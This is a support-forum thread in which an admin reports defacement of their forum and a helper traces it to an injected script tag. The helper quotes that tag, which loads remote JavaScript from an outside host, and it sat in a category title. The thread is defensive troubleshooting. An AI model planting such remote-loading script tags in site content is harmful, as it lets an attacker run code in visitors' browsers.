The forum of the forums
Welcome to the Official Support Forum of Forumotion!

To take full advantage of everything offered by our forum, please log in if you are already a member, or join our community if you've not yet.



Create a free forum like this one.

Someone hacking our forum/Code

View previous topic View next topic Go down

Solved Someone hacking our forum/Code

Post by BalkanHax on May 2nd 2015, 12:52 am

Hello Communtity,

we have problems with hackers since some days on our phpBB Forum. (http://www.rs-srb.com/)


Here are some examples what happened these days:
The hackers write or put a picture at any place of the front page. On this screen (http://www11.pic-upload.de/02.05.15/9oxf23di1nn3.png) you can see that the hackers write "Toti Toti" on the left side, next to the header. Those things they do in any variation.

Another example is that they can turn arround the chatbox 180 or also like an animation, that the chatbox is at the beginning on right position and then it begin to turn on the head.

We controll in the admin panel if somebody have acces who should not have but we dont find something mysterious. Now we would like to know, do the hackers need to enter the admin panel to do things on the Homepage Code or are they using any bug to do that?

Thank you for your help.

Greets.

BalkanHax
New Member

Posts : 11
Reputation : 1
Language : German, English, Serbian

http://www.rs-srb.com/

Back to top Go down

Solved Re: Someone hacking our forum/Code

Post by Ange Tuteur on May 2nd 2015, 1:15 am

Hi @BalkanHax,

Do you have HTML enabled on your forum ? If so, I'd recommend that you disable it.
Administration Panel > General > Messages and E-mails > Configuration

Allow HTML : No


Furthermore, I also recommend that you analyze code that you get from sources you don't trust before installing it on your forum.

Ange Tuteur
Forumaster

Male Posts : 13028
Reputation : 2704
Language : EN10, FR5
Location : Pennsylvania

http://fmdesign.forumotion.com

Back to top Go down

Solved Re: Someone hacking our forum/Code

Post by BalkanHax on May 2nd 2015, 1:39 am

Hello Ange Tuteur,

the HTML was not enable in our forum, i check it.

Can you also explain me what you mean with "analyze code that you get from sources you don't trust before installing it on your forum". We are not experts and dont know how we can delete for example that "Toti Toti" on the left side of the forum. http://www.rs-srb.com/

A step-by-step explanation would be nice of you.

BalkanHax
New Member

Posts : 11
Reputation : 1
Language : German, English, Serbian

http://www.rs-srb.com/

Back to top Go down

Solved Re: Someone hacking our forum/Code

Post by Ange Tuteur on May 2nd 2015, 1:43 am

HTML, JavaScripts, look over that kinda stuff before adding it to widgets, and other things. As for "Toti Toti", I don't see it :


Does this occur while logged in only ?

Ange Tuteur
Forumaster

Male Posts : 13028
Reputation : 2704
Language : EN10, FR5
Location : Pennsylvania

http://fmdesign.forumotion.com

Back to top Go down

Solved Re: Someone hacking our forum/Code

Post by BalkanHax on May 2nd 2015, 1:49 am

Ange, i write you a private message, please check it.

BalkanHax
New Member

Posts : 11
Reputation : 1
Language : German, English, Serbian

http://www.rs-srb.com/

Back to top Go down

Solved Re: Someone hacking our forum/Code

Post by Ange Tuteur on May 2nd 2015, 2:08 am

From what I can tell, someone from your administration team inserted the following script in the title of one of your categories.
Code:
<script src="http://atleticomadrid.esy.es/s/e.js"></script>

The category title it was in, was "Internacionalna takmicenja / International Competitions"

Security didn't log who it was, but I enabled Confirm password to administration access so it logs when someone enters the admin panel. This way if you notice anything weird, I recommend you check the last users to log into the Admin Panel.

You can see it under :
Administration Panel > General > Security

Scroll down to last actions.

Ange Tuteur
Forumaster

Male Posts : 13028
Reputation : 2704
Language : EN10, FR5
Location : Pennsylvania

http://fmdesign.forumotion.com

Back to top Go down

Solved Re: Someone hacking our forum/Code

Post by BalkanHax on May 2nd 2015, 2:43 am

Thank you Ange Tuteur for your help. We notice now where is the problem and we will have a look at it at the future.

BalkanHax
New Member

Posts : 11
Reputation : 1
Language : German, English, Serbian

http://www.rs-srb.com/

Back to top Go down

Solved Re: Someone hacking our forum/Code

Post by Ange Tuteur on May 2nd 2015, 3:30 am

You're welcome ^^

Topic archived

If you have anymore problems, feel free to open a new topic. Smile

Ange Tuteur
Forumaster

Male Posts : 13028
Reputation : 2704
Language : EN10, FR5
Location : Pennsylvania

http://fmdesign.forumotion.com

Back to top Go down

View previous topic View next topic Back to top


 
Permissions in this forum:
You cannot reply to topics in this forum